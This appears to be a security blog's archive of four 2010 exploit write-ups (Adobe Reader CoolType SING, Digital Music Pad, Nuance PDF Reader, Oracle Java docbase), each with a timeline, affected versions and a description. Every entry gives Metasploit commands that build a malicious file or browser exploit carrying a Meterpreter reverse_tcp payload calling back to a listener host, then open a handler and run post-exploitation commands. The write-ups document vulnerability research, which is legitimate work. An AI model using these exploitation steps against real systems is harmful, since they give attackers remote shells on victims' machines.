Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2010-2883 : Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow

Exploits, Metasploit, ,

Timeline :

Vulnerability exploited in the wild and discovered by Mila Parkour the 2010-09-06
Metasploit PoC provided the 2010-09-08

PoC provided by :

sn0wfl0w
vicheck
jduck

Reference(s) :

CVE-2010-2883
APSA10-02

Affected version(s) :

Adobe Reader 9.3.4 and previous versions for Windows, Macintosh and UNIX.
Adobe Acrobat 9.3.4 and previous versions for Windows and Macintosh.

Tested on Windows XP SP3 with :

Adobe Reader 9.3.4

Description :

This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior version are assumed to be vulnerable as well.

Commands :

use exploit/windows/fileformat/adobe_cooltype_sing
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

EDB-ID-15134 : Digital Music Pad SEH overflow

Exploits, Metasploit

Timeline :

Vulnerability discovered and PoC disclosed on Exploit-DB by Abhishek Lyall the 2010-09-17
Metasploit PoC provided the 2010-10-03

PoC provided by :

Abhishek Lyall

Reference(s) :

EDB-ID-15134

Affected version(s) :

Digital Music Pad 8.2.3.3.4

Tested on Windows XP SP3 with :

Digital Music Pad 8.2.3.3.4

Description :

This module exploits a buffer overflow in Digital Music Pad Version 8.2.3.3.4 When opening a malicious pls file with the Digital Music Pad, a remote attacker could overflow a buffer and execute arbitrary code.

Commands :

use exploit/windows/fileformat/digital_music_pad_pls
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

OSVDB-68514 : Nuance PDF Reader v6.0 Launch Stack Buffer Overflow

Exploits, Metasploit,

Timeline :

Vulnerability discovered by corelanc0d3r & rick2600 the 2010-04-03
Vulnerability disclosed to the vendor the 2010-04-08
Coordinated vulnerability disclosure the 2010-10-08
Metasploit PoC provided the 2010-10-08

PoC provided by :

corelanc0d3r
rick2600

Reference(s) :

OSVDB-68514

Affected version(s) :

Nuance PDF Reader 6.0

Tested on Windows XP SP3 with :

Nuance PDF Reader 6.0

Description :

This module exploits a stack buffer overflow in Nuance PDF Reader v6.0. The vulnerability is triggered when opening a malformed PDF file that contains an overly long string in a /Launch field. This results in overwriting a structured exception handler record. This exploit does not use javascript.

Commands :

use exploit/windows/fileformat/nuance_pdf_launch_overflow
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2010-3552 : Oracle Java Runtime New Plugin docbase Buffer Overflow

Exploits, Metasploit,

Timeline :

Vulnerability discovered by Stephen Fewer and submitted to ZDI
Vulnerability reported to the vendor by ZDI the 2010-07-20
PoC provided by berendjanwever the 2010-08-31
Coordinated vulnerability disclosure the 2010-10-12
Metasploit PoC provided the 2010-10-25

PoC provided by :

jduck

Reference(s) :

CVE-2010-3552
ZDI-10-206

Affected version(s) :

All Oracle JRE versions previous version 6 update 22.

Tested on Windows XP SP3 with

Oracle JRE 6 Update 20

Description :

This module exploits a flaw in the new plugin component of the Sun Java Runtime Environment before v6 Update 22. By specifying specific parameters to the new plugin, an attacker can cause a stack-based buffer overflow and execute arbitrary code. When the new plugin is invoked with a “launchjnlp” parameter, it will copy the contents of the “docbase” parameter to a stack-buffer using the “sprintf” function. A string of 396 bytes is enough to overflow the 256 byte stack buffer and overwrite some local variables as well as the saved return address. NOTE: The string being copied is first passed through the “WideCharToMultiByte”. Due to this, only characters which have a valid localized multibyte representation are allowed. Invalid characters will be replaced with question marks (‘?’). This vulnerability was originally discovered independently by both Stephen Fewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn’t been done, all versions since version 6 Update 10 are believed to be affected by this vulnerability. This vulnerability was patched as part of the October 2010 Oracle Patch release.

Commands :

use exploit/windows/browser/java_docbase_bof
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig